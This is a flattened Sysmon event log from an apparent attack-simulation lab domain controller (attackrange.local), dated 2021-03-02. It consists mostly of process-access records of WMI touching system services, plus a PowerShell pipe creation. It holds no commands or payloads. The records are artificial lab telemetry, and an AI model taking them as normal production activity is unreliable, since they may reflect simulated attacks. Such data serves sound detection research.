16:54:03.201{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B8AA-00000000AD01}12596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002240196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:03.201{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692\PSHost.132591776430642185.14692.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002240195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6DAB-603E-B8AA-00000000AD01}1259615408C:\Windows\system32\conhost.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 